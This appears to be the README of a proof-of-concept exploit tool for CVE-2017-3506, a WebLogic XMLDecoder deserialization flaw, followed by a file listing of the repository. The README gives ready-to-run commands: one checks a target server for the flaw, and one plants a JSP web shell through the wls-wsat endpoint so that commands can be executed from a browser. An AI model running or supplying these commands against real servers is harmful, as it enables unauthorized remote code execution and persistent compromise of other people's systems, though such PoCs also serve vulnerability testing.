CVE-2017-3506#### What is this?
This is a poc of CVE-2017-3506(Weblogic XMLDecoder Serialization)
#### How to use it?
###### check vul
```
java -jar WebLogic-XMLDecoder.jar -u http://192.168.174.144:7001
```

##### GetShell
~~~
java -jar WebLogic-XMLDecoder.jar -s http://192.168.174.144:7001 /wls-wsat/CoordinatorPortType11 shell.jsp
~~~

Then you can execute the command through the browser:

[4.0K] /data/pocs/f7d53352ac89e2b07d9259b5ada70951e221eccb
├── [4.0K] img
│ ├── [ 55K] check.png
│ ├── [ 15K] execut_command.png
│ └── [ 26K] GetShell.png
├── [ 516] README.md
└── [ 11K] WebLogic-XMLDecoder.jar
1 directory, 5 files